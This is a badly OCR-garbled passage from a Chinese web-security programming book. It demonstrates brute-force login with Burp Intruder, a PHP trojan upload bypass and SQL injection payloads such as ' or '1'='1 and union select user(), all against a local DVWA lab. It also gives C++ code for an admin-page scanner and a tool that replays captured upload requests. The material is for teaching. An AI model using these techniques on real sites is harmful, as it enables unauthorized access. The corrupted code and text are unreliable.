Connection’: ¢lose 


EE Aas787 tines=Bly; asse4 times=W; 
I BD 3 ,NB SE wR 




















图 9-28 Burp 的 Intruder 页 签 


接着 选择 “Positions” 子 页 签 右 侧 的 “Payloads” 子 页 签 ， 如 图 9-29 所 示 。 




















Payload count © 


Payload set [1 im) 
| Payioad typa; | Simple hst 岗 Reovestcount 0 








| Add Fomist .. 于 wu 本 mr | 出 | 


在 进行 暴力 破解 的 时 候 ， 字 典 会 不 断 地 对 它 进行 替换 。 











图 9-29 


Intruder 页 签 下 的 Payloads 子 页 签 


单 击 图 9-29 中 的 “Add fronmilist” 下 拉 框 ， 在 下 拉 框 中 选择 “Passwords”， 然 后 在 下 拉 框 
上 面 的 列表 中 会 出 现 很 多 常用 的 密码 ， 然 后 在 该 子 页 签 的 右上 角 单 击 “Start attack” 按 钮 进 
行 暴力 破解 。 这 时 会 在 “Intruder attack” 窗 口中 使 用 密码 字典 来 逐个 蔡 换 刚才 的 “变量 ”来 


尝试 暴力 破解 ， 但 是 从 列表 中 没有 给 出 破解 成 功 的 提示 ， 怎 


么 能 够 知道 哪 条 才 是 真正 破解 成 


功 的 密码 呢 ? 其 实 这 就 体现 出 了 Burp 的 强大 了 , 因为 它 是 一 个 通用 的 工具 , 在 保证 通用 的 前 
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将 前 岂 啊 钼 山 加 台 


之 


提 下 ， 失 去 一 些 具体 的 提示 并 不 为 过 ， 那 么 如 何 判 断 哪 个 是 暴力 破解 成 功 的 记录 呢 ? 其 实 很 
简单 ， 只 要 看 一 下 “Length” 列 即 可 。 因 为 破解 成 功 返 回 的 数据 的 长 度 肯 定 和 其 他 数据 的 长 
度 不 一 致 ， 这 样 就 可 以 判断 出 哪 条 是 破解 成 功 的 密码 了 ， 如 图 9-30 所 示 。 



















Fiter: Showing all tems 














| Reguest 。 | Payload Status | Error | Timeout |Lafigth Wl Cor 
| 2580 password 200 已 过 [BB 
io 200 日 回 5283 
| 点 Iroot 200 已 回 5263 

到 SSRV 200 六 器。 5263 
I7 Ssecures 200 | 回 ”5s263 

18 *3noguru ” 200 于 问 。 5s263 

Iii0 AMl 200 外 加 5263 

| 41 ABC123 200 日 加 sz263 

从 ACCESS 200 回 回 sz263 

13 ADLDEMO 200 日 回 5253 

14 ADHIN 200 加 回 。 5s263 

便 ALLIN1 200 可 回 有 63 























图 9-30 Intruder attack 列表 


为 了 能 够 快速 地 找到 密码 ， 可 以 通过 单 击 “Length” 列 来 进行 排序 ， 从 图 9-30 中 可 以 看 
出 ， 爆 破 成 功 的 密码 是 第 2590 行 的 记录 ， 密 码 是 “password”。 

通过 上 面 的 测试 得 出 “admin” 用 户 的 密码 是 “password”， 读 者 可 以 通过 输入 这 组 账号 
和 密码 进行 测试 ， 再 输入 错误 的 账号 和 密码 进行 测试 就 会 发 现 ， 返 回 的 结果 是 不 相同 的 ， 这 
就 说 明 可 以 通过 判断 返回 包 的 长 度 来 判断 众多 测试 中 哪 条 才 是 正确 的 。 

在 图 9-30 的 最 上 面 一 条 记录 ， 即 测试 成 功 的 记录 上 单 击 右键 ， 在 弹出 的 菜单 中 选择 
“Generate CSRF PoC” 会 打开 一 个 新 的 窗口 ， 在 窗口 的 下 半 部 分 会 有 一 段 HTML 代码 ， 代 码 


如 下 : 
<html> 
< DIRE Ror mT generated by burp Sulte Perotesslondl 
<body> 
<form action="http://localhost/dvwa-l.9/vulnerabilities/brute/"> 
<input type="hidden" name="HUsername" value="admin™" /> 
<input type="hidden" name="password'" value="password" /> 
<input type='"hidden" name="Login" walue="Login" /> 
<input type="submit" walue="Submit request™ /> 
</form> ? 
</body> 
</html> 





将 该 段 代 码 保存 成 扩展 名 为 “html” 的 文件 ， 然 后 直接 双击 即 可 显示 出 登录 成 功 后 的 提示 。 

(2) File Upload 模块 

文件 上 传 是 很 多 网 站 都 有 的 ， 比 如 社交 网 站 的 上 传 头 像 ， 上 传 照片 ， 比 如 资源 网 站 可 以 
上 传 一 个 共享 软件 ， 上 传 压缩 包 等 。 那 么 在 这 种 情况 下 ， 如 果 网 站 对 于 上 传 过 滤 不 严格 的 话 ， 
就 可 以 上 传 木马 或 恶意 程序 ， 这 对 于 服务 器 危害 是 非常 大 的 。 本 节 仍 然 用 Burp Suite 来 演示 
DVWA 中 的 File Upload 模块 (设置 为 Medium 级 别 ， 因 为 Low 级 别 可 以 直接 上 传 ) 是 如 何 
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被 上 传 一 个 木马 的 。 

单 击 “File Upload” 打 开 上 传 模块 的 部 分 ， 看 到 一 个 可 以 选择 上 传 文件 的 文件 框 和 上 传 
文件 的 提交 按钮 ,选择 一 个 正常 的 图 片 文件 上 传 , 会 提示 上 传 成 功 , 并 返回 一 个 上 传 的 地 址 ， 
地 址 为 “../../hackable/uploads/testjpg”， 用 该 返回 的 地 址 直接 贴 到 当前 URL 后 面 就 会 打开 图 
片 , 打开 后 的 URL 地址 为 “http://localhost/dvwa-1.9/hackable/uploads/test.jpg”。 然 后 选择 一 个 
PHP 的 木马 文件 上 传 ， 会 提示 不 是 JPEG 或 PNG 的 文件 ， 如 图 9-31 所 示 。 


Choase an image to upload 


| 选择 文件 | 未 选择 任何 文件 


Upload 


Tour inage Was not uplosded. We can only accept TPEG or PHG images. 





9-31 cmd.php 上 传 失败 


打开 Burp 启动 拦截 , 然后 设置 浏览 器 的 代理 , 然后 再 次 上 传 PHP 木马 查看 Burp 中 截取 
到 的 HTTP 数据 ， 如 图 9-32 所 示 。 


WebFitFormBoundaryilPuY3HBhkEm honx 
Content-Disposition: form-data; name="MAX FILE SIZFE" 


WebFKitFormBoundaryilPuY3HBhkm hinx 
Content-Disposition: form-data; name="uploaded"; filename="cmd. php" 


图 9-32 Burp 对 木马 上 传 的 抓 包 








在 图 9-32 中 的 “Content-Type” 中 可 以 看 出 ， 这 里 提交 的 类 型 并 不 是 图 片 的 类 型 。 那 
么 将 如 何 修改 呢 ? 将 本 地 木马 的 扩展 名 修改 为 “png” 或 “jpg” 的 格式 ， 然 后 再 次 提交 ， 
如 图 9-33 所 示 。 


WebFKitFormBoundaryxiRbifwgbhvebeowWl 


Content-Disposition: form-data; name="MAX FILE SIZE™ 





和 WebkKitFormBoundaryxj Pbj fwgbvEbaxwwl 


Content -Disposhtlhaltorl- ata; name="uploaded'"; filenamed"cmd.jpg'" 
Content-Type:| image/ijpeg 


图 9-33 Burp 对 修改 扩展 名 的 木马 上 传 抓 包 





从 图 9-33 中 可 以 看 到 “Content-Type” 的 类 型 已 经 改变 了 ， 但 是 注意 在 “fillename” 处 文 
件 名 是 “cmd:jpg”， 这 样 上 传 后 文件 就 是 一 个 jpg 的 文件 ， 那 么 在 这 里 修改 jpg 的 扩展 名 为 php， 
然后 单 击 “Forward” 让 Burp 将 数据 包 提 交 到 Web 服务 器 。 返 回 DVWA 中 可 以 看 到 cmd.php 
的 木马 文件 已经 上 传 成 功 了 ， 打 开 地 址 “http://localhost/dvwa-1.9/hackable/uploads/cmd.php”， 
可 以 正常 打开 上 传 的 木马 文件 。 








吝 将 沿革 啊 狂 山口 站 


| 





人 
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| 便 妾 前 其 只 汀 ”岩心 潍 


在 第 2 章 中 写 过 一 个 通过 发 包 来 进行 暴力 破解 的 程序 ， 在 程序 中 每 次 发 包 时 会 修正 包 的 
长 度 ， 而 Burp Suite 会 自动 修正 包 的 长 度 ， 这 一 个 小 的 功能 就 非常 “贴心 ”。 从 第 二 个 实例 中 
可 以 体会 到 Burp Suite 存在 于 浏览 器 和 服务 器 的 中 间 , 可 以 对 浏览 器 提交 的 数据 包 进 行 截取 、 
修改 、 发 送 ， 因 此 善于 利用 Burp Suite 的 这 个 功能 可 以 很 好 地 绕 过 很 多 Web 前 端 页 面 的 数据 
校 验 ， 也 可 以 通过 修改 数据 包 达 到 欺骗 后 台 的 效果 ， 类 似 于 上 面 的 例子 ， 提 交 的 类 型 是 图 片 
类 型 ， 但 是 实际 上 却 是 一 个 PHP 的 文件 。 

(3) SQL Injection 模块 

SQL Injection 是 用 来 练习 SQL 注入 攻击 的 模块 ，SQL 注入 也 是 常见 的 Web 攻击 方式 。 
SQL 是 结构 化 查询 语言 ， 是 一 种 针对 数据 库 设 计 的 查询 语言 ， 可 以 完成 对 数据 库 的 增 、 删 、 
改 、 查 等 操作 ， 最 主要 的 还 是 进行 各 种 各 样 的 查询 ， 而 且 可 以 通过 简单 的 语句 构造 出 来 复杂 
的 查询 。SQL 注入 就 是 通过 构造 SQL 语句 从 而 进行 攻击 的 一 种 技术 。 

在 使 用 SQL Injection 模块 进行 练习 之 前 , 简单 描述 什么 是 SQL 注入 。 在 可 以 交互 的 Web 
系统 中 ， 通 常 都 会 有 用 来 进行 输入 的 输入 框 ， 比 如 输入 用 户 名 和 密码 的 输入 框 ， 填 写 注册 信 
息 的 输入 框 等 都 可 以 向 Web 系统 提交 信息 。 在 正常 情况 下 用 户 会 按照 提示 进行 相应 的 输入 ， 
但 是 不 怀 好 意 的 人 会 有 意 地 输入 其 他 有 特殊 意义 的 符号 ， 由 于 特殊 符号 的 作用 ， 就 会 导致 意 
想不到 的 情况 (不 怀 好 意 的 人 不 一 定 是 攻击 者 ， 比 如 注册 的 时 候 随便 填写 可 能 导致 Web 页 面 
不 正常 显示 之 类 , 现在 这 样 的 系统 比 以 前 大 大 减少 , 但 并 不 是 说 已 经 不 存在 了 )。 对 于 恶意 攻 
击 者 而 言 ， 则 会 有 意 地 使 用 SQL 语法 的 关键 字 或 符号 来 构造 一 些 输 入 , 使 得 构造 的 输入 在 数 
据 库 中 被 执行 ， 从 而 获得 更 有 价值 的 信息 。 

经 过 上 面 简单 的 介绍 ， 读 者 可 能 对 SQL 注入 已 经 有 个 简单 的 了 解 了 ， 现 在 来 看 一 下 
DVWA 系统 中 的 SQL Injection 模块 (级 别 为 Low)， 如 图 9-34 所 示 。 











图 9-34 DVWA 的 SQL Injection 模块 


9-34 中 有 一 个 输入 框 ， 从 该 输入 框 中 就 要 完成 SQL 注入 的 联系 。 随 便 输 入 一 个 “1” 
(实际 输入 没有 引号 )， 会 返回 ID 为 1 的 “First name” 和 “Sumame”， 接 着 输入 一 个 “2”, 
同样 会 返回 ID 为 2 的 “First name” 和 “Surname”。 那 么 再 输入 一 个 “a”， 就 什么 都 没有 返 
回 。 输入 “1” 和 “2” 有 返回 结果 ， 而 输入 “a” 没 有 返回 结果 ， 那 是 因为 数据 库 中 并 没有 
ID 为 “a” 的 记录 ， 而 数据 库 中 存在 ID 为 “1” 和 “22” 的 记录 ， 那 这 能 说 明 什 么 问题 呢 ? 说 
明 有 没有 该 ID 对 应 的 数据 ， 是 需要 在 数据 库 中 进行 查询 的 ， 那 么 是 怎么 查询 的 呢 ? 可 能 是 
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这 样 的 两 种 查询 语句 ， 第 一 种 查询 语句 如 下 : 


Select firstname, srnane from 表 名 where id = 1 1? 


第 二 种 查询 语句 如 下 : 


Select firstname, surname from 表 名 where ia = 1 

这 两 种 语句 的 写法 如 果 对 于 没有 SQL 语言 基础 的 读者 又 不 仔细 看 的 情况 下 可 能 没有 看 
出 差别 ， 第 一 名 和 第 二 名 的 差别 在 于 第 一 句 的 1 是 被 单 引号 引 住 的 ， 第 二 句 则 直接 是 1。 它 
们 的 差别 是 第 一 句 查 的 ID 是 一 个 字符 串 类 型 的 ， 第 二 句 查 的 ID 是 一 个 数值 型 的 。 至 于 是 数 
值 型 还 是 字符 串 型 的 ， 对 注入 攻击 有 什么 差别 呢 ? 是 有 的 。 因 为 那个 ID 的 值 是 输入 的 ， 那 
里 是 一 个 变量 ， 实 际 写 程序 时 可 能 是 进行 拼接 的 ， 看 一 下 上 面 的 字符 串 是 如 何 拼接 的 。 


第 一 种 拼接 方法 : 

SSERASELSEEIEEESEISREA stride ERA 
第 二 种 拼接 方法 : 

Ssql = "select firstname, surname from 表 名 where ia = Sid; 


可 以 看 到 ， 在 第 一 种 使 用 字符 串 拼 接 的 时 候 ，$id 的 前 后 会 有 引号 的 存在 ， 而 在 第 二 种 
字符 串 拼接 的 时 候 ，$id 的 前 后 是 没有 使 用 引号 的 。 这 两 种 语句 的 问题 就 放 在 这 里 不 讨论 了 ， 
马上 会 知道 字符 串 和 数值 的 区 别 ， 先 接着 往 下 讲 。 

在 各 种 语言 中 都 有 逻辑 运算 符 ， 当 然 在 SQL 语句 中 也 有 ，SQL 中 的 “与 ”用 and 表示 ， 
或 用 or 表示 。 如 果 一 条 逻辑 语句 是 “Xx XX and 1=1” 
这 样 写 的 ， 是 不 会 影响 X X X 原 来 逻辑 的 ， 因 为 1=1 
是 永远 为 真 的 。 来 构造 一 下 输入 的 内 容 , 这 里 输入 “1 
and '1'='1”， 如 图 9-35 所 示 。 

点 提交 以 后 仍然 会 看 到 ID 为 1 的 信息 ， 那 么 上 
面 的 输入 是 如 何 拼 接 成 SQL 语句 的 呢 ? 大 体 如 下 。 


中 








UserlD: tandt=1 ||Submit| 








图 9-35 构造 的 AND 语句 


$sql = "select firstname7 surname from 表 和 where jd Er Sea mum 
那么 拼接 后 的 语句 如 下 : 
select Firstnamne, surname from 表 名 where ia = "1" and “1'="9'y 


现在 知道 and '1'='1' 是 不 改变 前 面 的 逻辑 值 的 ， 也 就 是 对 id='1' 是 否 存 在 是 不 改变 的 ， 也 
就 是 id='1' 是 真 ，id='1' and '1'='1' 就 是 真 ， 如 果 id='1' 是 假 ， 那 么 id='1' and '1='1' 还 是 假 。 在 输 
入 时 ,第 一 个 1 后 面 有 一 个 单 引 号 ,是 用 来 和 代码 中 的 SQL 语句 中 的 单 引号 进行 闭合 的 ,而 
最 后 一 个 1 的 前 面 有 一 个 单 引 号 , 它 是 用 来 和 SQL 语句 中 的 单 引号 进行 配对 的 。 因 为 在 代码 
中 本 身 就 存在 单 引 号 的 。 如 果 在 代码 中 用 的 不 是 字符 串 ， 而 
输入 框 中 构造 的 有 单 引 号 ， 则 会 抛 出 异常 。 因 此 ， 猜 测 的 两 UseriD 
种 方法 这 里 使 用 的 是 第 一 种 。 

那么 如 何 让 这 个 语句 永 真 昵 ， 还 是 利用 该 等 式 '1='1， 只 pr 


TD 1” 08 "le: 








是 逻辑 连接 符 由 and 改 为 or。 Farst none, Gorden 

那么 再 次 在 输入 框 中 提交 “1'or'1'='1”， 提 交 后 如 图 9-36 a 
所 示 。 eo 

从 图 9-36 中 可 以 看 出 ,由 于 提交 的 内 容 是 “1'or'1='1”， 图 9-36 构造 的 or 语句 
那么 构造 的 SQL 语句 就 成 为 了 如 下 语句 : 

Seléct firstname; surname from 表 %®g® Where id = 1" Or ‘1» = 1 


I 
Us 
| 


齐 将 沿革 啊 狂 山 @ 滥 


| 
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焦 将 前 洲 唤 湘 ” 山 co 潍 


由 于 查询 条 件 永 真 ， 那 么 将 会 把 所 有 的 记录 都 列 出 来 。 那 么 该 语句 还 适合 于 在 前 面 的 
“Brute Forece” 模 块 中 进行 测试 ， 在 输入 用 户 名 的 地 方 输入 “admin' or'1='1”， 在 输入 密码 的 
地 方 也 输入 “admin' or'1='1”， 同 样 可 以 得 到 与 输入 正确 密码 的 一 样 的 效果 。 

SQL 注入 是 非常 灵活 的 ， 下 面 再 随便 输入 几 个 测试 的 语句 ， 如 “1 union select user(), '1” 
和 “1' union select database(), '1”， 可 以 显示 出 系统 登录 数据 库 的 用 户 名 和 当前 系统 所 使 用 的 
库 名 ， 如 图 9-37 和 图 9-38 所 示 。 













-| 
User 人 User 上 D- | Submit | 

ID: 1 ”uion select User()， "1 ID: 二 wion select database(), "1 

First name: admnin First name; adnin 

Surname: admin Surname, admin 

ID, 1 union select user(), "1 ID; 1 wion select databasel), *1 

First name; root@localhost First name, dywa 

Surname- 1 Surname: 1 














图 9-37 系统 登录 数据 的 用 户 为 root 图 9-38 系统 所 使 用 的 库 名 为 dvwa 





SQL 注入 的 灵活 是 因为 SQL 语句 本 身 的 灵活 ， 要 想 更 好 地 掌握 SQL 注入 那么 就 一 定 要 
先 掌握 SQL 语言 的 使 用 。 

在 本 节 演 示 了 DVWA 系统 的 3 个 模块 ， 分 别 是 Brute Force、File Upload 和 SQL Injection 。 
Web 系统 的 漏洞 基本 也 是 因为 对 用 户 提 交 的 数据 过 滤 不 严格 而 造成 的 , 一 切 用 户 的 输入 都 应 该 
视 为 不 安全 的 ， 因 此 安全 编码 就 是 从 开发 人 员 层 面 来 杜绝 系统 产生 漏洞 ， 在 系统 上 线 之 前 还 会 
有 代码 审计 、Web 漏洞 扫描 等 上 线 前 的 安全 检查 ， 针 对 Web 安全 防护 的 系统 有 ADS、WAF、 
网 页 防 算 改 等 。 当 然 了 , 最 关键 的 还 是 从 编码 时 就 考虑 安全 的 问题 , 从 源头 杜绝 系统 产生 漏洞 。 

4. Web 安全 工具 的 开发 

上 一 节 简 单 地 演示 了 DVWA 系统 中 一 些 简 单 漏洞 的 利用 ， 本 书 不 是 介绍 PHP 代码 审计 
的 书籍 ， 也 不 是 介绍 Web 安全 的 书籍 对 于 本 书 而 言 还 是 需要 完成 相应 的 工具 才 是 读者 的 学 
习 目 的 。 因 此 ， 案 例 是 否 讲 得 够 清楚 不 要 紧 ， 要 紧 的 是 完成 自己 的 安全 工具 。 

(1) 后 台 登 录 地 址 扫描 工具 

首先 来 完成 一 个 后 台 扫 描 工 具 ， 在 进行 Web 安全 活动 时 通常 会 去 查找 后 台 登 录 页 面 ， 找 
到 登录 页 面 以 后 可 能 会 使 用 暴力 破解 密码 或 者 SQL 注入 等 一 系列 的 方法 去 尝试 登录 。 

对 于 一 个 扫描 后 台 登 录 地 址 的 工具 来 ”= i 


























说 ， 常 用 的 方法 是 通过 袜 典 去 党 试 。 这 里 仍 下 
然 使 用 字典 中 保存 的 后 台 页 面 来 逐个 地 进行 “| ， 只 习 运 孝 
尝试 ， 不 过 后 台 登 录 页 面 通常 都 有 一 些 俗称 | 三。 " 
的 命名 方式 ， 昌 然 没 有 规范 ， 但 是 大 多 都 使 “| 8 
用 诸如 “login”、“index” 这 类 的 文件 名 , 相 。| 六” 
比 密码 而 言 它 的 组 合 就 少许 多 了 。 | | 
下 面 看 一 下 扫描 后 台 工具 的 界面 界面 | | 
| i 
图 9-39 中 最 常见 的 编辑 框 用 于 输入 要 扫 图 9-39 后 台 登录 扫描 工具 
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描 网 站 的 URL， 下 拉 框 用 于 选择 扫描 的 类 型 ， 这 里 扫描 的 类 型 分 为 “PHP” 和 “ASP” 两 种 。 
填 入 扫描 网 站 的 URL， 并 选择 相应 的 扫描 类 型 单 击 “ 扫 描 ” 按 钮 就 可 以 开始 进行 扫描 ， 扫 描 
的 结果 会 显示 在 程序 下 方 的 列表 框 中。 


在 程序 启动 的 时 候 ， 需 要 在 窗口 初始 化 时 初始 化 程序 下 方 的 列表 框 ， 代 码 如 下 : 
nm ScanList,Insertoolumni (0 "可 撒 结果 "); 
m ScanList.SetColumnWidth(0, 400); 


m_ScanList 是 与 CListCtrl 关联 的 控件 变量 ， 相 关 的 定义 包括 : 


CGIUESECEEIRRISESSNGUHSHEY // 列表 框 控件 变量 

HANDLE m hpvent; // 事件 变量 ， 用 于 多 线程 传递 参数 时 使 用 
afx msg voldg OnBnelliekedBattonl 《7 

// 扫描 线程 


static DWORD WINAPT ScanThread(LPVOID lpParam); 


将 而 其 哆 钵 ” 需 必 外 


| = 


// 检查 URL 是 否 有 效 ， 即 检查 登录 后 台 页 面 是 否 有 效 
BOOL CheckUrl(CStrdinS strUrl); 


填写 好 URL 地 址 和 选择 了 下 拉 列 表 以 后 , 单 击 “扫描 ”按钮 就 可 以 开始 扫描 了 ， 由 于 扫 
描 任 务 不 能 和 程序 的 主 程序 为 同一 个 线程 ,那么 就 需要 再 启动 一 个 线程 启动 扫描 任务 ,“ 扫 描 ” 
按钮 的 代码 如 下 : 


void CScanAdminpageDlg:;:OnBnClickedButtoni () 


{ 
// TODO: 在 此 添加 控件 通知 处 理 程序 代码 
/7 清除 列表 框 内 容 


m ScanList.DeleteAllitems(); 


// 获取 输入 的 URL 内 容 
COEriny DER 
GetDlgItemText (IDC EDIT1, strURL); 


7Z/ 创建 事件 
m hEvent = CreateEvent (NULL, TRUERE, FALSE, NULL); 


// 创建 扫描 线程 

HANDLE hThread = NULL; 

hThread' = CreateThread (NULL, 0, (LPTHREAD START ROUTINE)ScanThread, this, 0, NULL); 
WaitForSsingleQbject (m hEvent, INFINITE); 


ResetEvent (m hEvent); 
} 
单 击 “扫描 ”按钮 时 会 创建 扫描 线程 来 进行 扫描 后 台 , 线程 函数 的 函数 名 为 ScanThread。 
代码 如 下 所 示 : 


DWORD WINAPI CScanAdminPageDlg: :ScanThread (LPVOID lpParam) 
下 





CScanAdminPageD1g *pThis = (CScanAdminPageDlg*)lpParam; 
SetEvent (pThis->m hpEvent); 


// 在 线程 函数 中 获取 下 拉 选 框 的 内 容 

// 下 拉 选 项 是 asp 和 PhP 两 项 

CString strWebType; 
pThis->GetDlgItemText (IDC COMBO1, strWebType); 


// 在 线程 函数 中 获取 扫描 URL 地 址 
Cotring StrUris 
prhls GotDLogrtemText (TDe BDETL, SthUsL) 


// 通过 下 拉 选 项 来 构造 字典 

// asp.dic 或 php.die 

char szFileName[MAX PATH] = { 0 }; 

wsprintf (szFileName, ‘S$%s,dic", strWebType); 
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/7 打开 字典 文件 
// 从 中 读 取 可 能 的 后 台 页 面 
FILE *DicFijle = NULL: 
fopen s(&DicFile, szFileName, "r"); 
char szDic[MAXBYTE] = { 0 }; 
while ( fgets (szDic, MAXBYTE,; DicFile) ) 
{ 
if ( SzDic[llstrlen(szDiey = 二] == IN ) 
{ 
szDic[lstrlen(szDic) = 1] = NULL; 
} 


// 扫描 RL 地 址 和 字典 中 的 页 面 文件 进行 拼接 
CStzing strCheckUrl = strUrl + szDic; 


// 判断 页 面 是 否 存 在 

// 存在 则 在 地 址 的 结尾 增加 “ [OK] ”字样 

if ( pTHiSs=->CheckUr1I (StrCheckUrl) ) 

{ 
StrCcheckUr}] += "[OK]";» 
pThis->m ScanList.LInsertIitem(0, strCheckUrl); 
continue; 


} 
// 将 扫描 的 地 址 添加 人 至 字典 


pThis=>m ScanList.InsertIitem(pThis->m ScanList.GetIitemCount(), strCheckUrl); 
下 


return 0; 


} 

下 拉 框 选项 中 有 “asp” 和 “php” 两 项 ， 分 别 是 常见 的 关于 ASP 系统 和 PHP 系统 后 台 登 
录 页 面 的 文件 名 ， 这 些 文件 名 可 以 从 其 他 的 安全 工具 中 获取 ， 也 可 以 自己 收集 。 笔 者 将 ASP 
和 PHP 的 字典 文件 分 别 命名 为 “asp.idec” 和 “php.dic”， 在 扫描 线程 函数 中 通过 获取 下 拉 选 
项 “asp” 或 “php” 与 “.dic” 字 符 串 进行 拼接 ， 从 而 合并 成 完整 的 字典 的 名 称 。 打 开 字 典 以 
后 逐 行 地 读 取 页 面 文件 ， 读 取 的 页 面 文件 类 似 “admin/login.asp”“wp-login.php” 等 ， 将 扫描 
的 URL 地 址 和 字典 文件 进行 拼接 后 , 构成 一 个 完整 的 扫描 页 面 进行 测试 , 如 果 该 下 ED 
在 ， 则 在 后 面 拼接 “[OK]” 字 符 串 表示 后 台 页 面 存在 。 最 后 ， 无 论 页 面 文件 是 否 存 在 都 会 
加 到 程序 的 列表 框 中 。 

在 程序 中 ， 判 断 页 面 文件 是 否 存在 的 函数 是 CheckUrl 函数 ， 该 函数 的 代码 如 下 : 


BOOL CScanAdminPageDlg; ;CheckUrl (CString strOzl) 
{ 

/建立 二 个 ISESSTON 

CInternetSessior session("ScanAdminPage"); 

// 建立 一 个 HTTP 连接 

cHttpConnection *pServer = NULL; 

// 获取 一 个 HTTP 文件 

CHttpFile *pFile = NULL; 


// 检测 输入 的 URL 是 否 符合 格式 ， 并 把 URL 解析 


Cstring strServerName;  // 服务 器 地 址 


CString strOobject; // URL 指向 的 对 象 
INTERNET PORT nPort; // 端口 号 

DWORD dwServiceType’; // 服务 类 型 

// _URL 解析 失败 则 返回 

// 解析 扫描 的 URL 


if ( !AfxParseURL(strUrl, dwServiceType, strServerName, strObject, npPort) ) 
{ 

return NULL; 
} 
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/7 服务 类 型 错误 


if "(dwsServicoeType I= INTERNET SRRVICE_RTTEEB ) 第 
{ 9 
rEeturn NULL; EE 
} 是 
// 配置 连接 服务 器 的 地 址 、 端 口 ， 并 获取 该 HTTP 连接 央 
BServer = Session.GetHttpConnection(strServerName, nPport)’; 客 
// 打开 该 HTTB 连接 编 
prile = pServer->0penRequest (CHttpConnection; :HTTP VERB, GET, strObject, NULL, 1, 程 
NULL, NULL, INTERNET FLAG EXISTING CONNECT | INTERNET_ FLAG NO AUTO REDIRECT); 实 
例 
try 
// 发 起 请 求 A 


prile=>SendRequest () 
} 
cateh (CBExeeption* e) 
{ 
return NULL: 
} 


DWORD dwRet; 
// 获取 该 请 求 的 回应 状态 码 。 - 
PFile->QueryinfoSstattisCode (dwRet); 


BOOL bRet = FALSE? 


// HTTP 返回 值 为 200 表示 成 功 
3f ( dwRet == 200 ) 
{ 

bRet = TRUE; 


} 


/7 释放 指针 

TE T(tle ts yt 
delete pFile; 

Le (pServer != NULELY) 
: delete pServer; 

} 


// 关闭 会 话 


session.Close(); 


return bRet; 


} 

在 代码 中 CInternetSession 类 方法 GetHttpConnection 是 用 来 使 程序 和 服务 器 建立 会 话 的 ， 
这 步 算是 建立 了 一 个 TCP 的 连接 ， 并 没有 真正 地 与 Web 进行 通信 。 使 用 CInternetSession:: 
GetHttpConnection 方法 建立 会 话 后 返回 了 CHttpConnection 类 的 指针 ， 通 过 CHttpConnection 
类 方法 OpenRequest 来 发 起 HTTP 请 求 ， 这 部 分 就 是 HTTP 的 真正 操作 了 ， 可 以 发 起 POST 
或 GET 等 常用 的 HTTP 请 求 。ChttpConnection::OpenRequest 方法 发 起 HTTP 请 求 后 就 返回 了 
CHttpFile 指针 ， 通 过 CHttpFile 类 方法 QueryInfoStatusCode 来 获取 服务 器 的 返回 码 。 如 果 返 
回 码 是 200， 表 示 页 面 存 在 ， 如 果 返 回 其 他 值 则 表示 页 面 不 存在 。 

Web 通信 最 常 使 用 的 就 是 HTTP 协议 ， 出 于 安全 的 考虑 又 发 展 了 HTTPS 协议 。 通 过 浏 
览 器 来 浏览 网 页 时 就 是 通过 HTTP 协议 来 发 起 GET 或 POST 请 求 ， 然 后 Web 服务 器 会 将 响 
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表 9-4 


荧 将 前 苦 只 湘 。” 需 心 潍 


分 组 
200 一 299 
300 一 399 
400 一 499 


500 一 599 


表 9-5 


《2) 上 传 网 页 木马 


一 全 





应 和 结果 返回 给 浏览 器 。 浏 览 器 在 向 Web 服务 器 发 起 HTTP 请 求 时 通常 被 称 为 request，Web 
服务 器 返回 数据 给 浏览 器 时 被 称 为 response。 HTTP 协议 也 有 它 相 关 的 头 部 , 在 第 2 章 时 已 经 
接触 过 了 。 如 果 读 者 对 于 Web 安全 感 兴趣 的 话 ， 那 么 就 需要 了 解 和 掌握 HTTP 协议 相关 的 知 
识 。 在 前 面 介 绍 了 通过 CHttpFile 类 的 QueryInfoStatusCode 可 以 获得 服务 器 的 返回 码 , 服务 
器 的 返回 码 在 HTTP 协议 中 给 出 了 描述 ， 这 里 给 出 MSDN 中 对 于 HTTP 返回 值 的 描述 ， 如 
表 9-4 所 示 ， 常 见 的 返回 值 如 表 9-5 所 示 。 


HTTP 状态 码 分 组 
解 释 
成 功 
信息 
请 求 错 误 
服务 器 错误 


常用 的 HTTP 状态 码 
解释 





找到 了 URL 
无 法 理解 的 请 求 





找 不 到 请 求 的 URL 
服务 器 不 支持 请 求 的 方法 
未 知 的 服务 器 错误 
已 达到 服务 器 容量 








下 面 用 本 节 编 写 的 扫描 工具 来 扫描 DVWA 的 后 台 页 面 地 址 ， 虽 然 打开 DVWA 系统 后 直 
接 可 以 显示 它 的 登录 页 面 ， 但 这 里 只 是 用 来 进行 演示 ， 如 图 9-40 所 示 。 


URL otro/focahost/dvwa-1.9/ [pho 四 扫 指 | 








图 9-40 扫描 DVWA 后 台 的 登录 页 面 


http:jjijocalhost/dwwa-1.9jiogmn.phpfOK] 


htrp://iocalhost/ dvwa-1.9/admin/account. htrml 
http://locahost/ dvwa-1 .9/adrmin.php 


上 一 节 中 在 DVWA 系统 Upload File 模块 中 演示 了 上 传 木马 的 模块 ， 该 功能 可 以 通过 直 
接 发 包 达 到 上 传 的 效果 ， 实 现 起 来 比较 简单 ， 代 码 如 下 : 
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void CuploadmumaDlg: :OnBnClickedButton1 () 


[ 
// TODO:; 在 此 添加 控件 通知 处 理 程序 代码 
WSAData wsa = { 0 }; 
/7 初始 化 
WSAStartup (MAKEWORD (2, 2), &wsa); 


// 获取 IE 地址 
DWORD dwIiPAddr = 0; 
m IpAddr.GetAddress (dwIPAddr); 


// 获取 端口 号 
WORD dwPort = 07 
dwPort = GetDlgItemInt (IDC PORT); 


// 创建 SOCKET 
SOCKET s = socket (PF_ INET, SOCK_ STREAM, IPPROTO TCP); 
sockaddr in sockaddr = { 0 }; 


sockaddr.sin family = AF INET; 
sockaddr. sin addr.S un.s addr = htonl (dwliPAddr); 
sockaddr.sin port = htons (dwPort),; 


// 连接 服务 器 
Int nRet = Connect(s， (SOCKADDR*) &sockaddr, sizeof (SOCKRDDR) ) 


// 获取 从 BURP 截取 的 HTTP 的 request 包 

char szText[2048] 三 {0 1}; 
GetDlgItemText (IDC TEXT, szText, 2048); 

// 发 送 包 

nRet = send(s, szText, lstrlen(szText), 0); 
closesocket (s); 


WSACleanup (); 


} 
代码 的 流程 比较 简单 ， 主 要 就 是 完成 了 与 Web 服务 器 的 连接 ， 然 后 发 送 通过 Burp 截取 
的 数据 内 容 ， 程 序 界 面 如 图 9-41 所 示 。 


-| cmdiphp 
和 


Fr Ca] 


aryN6IA31WLEcdKVan6 
rdata; name= MAX FIE_SIZE” 





aryN6iA31WLEcdKVgn6 
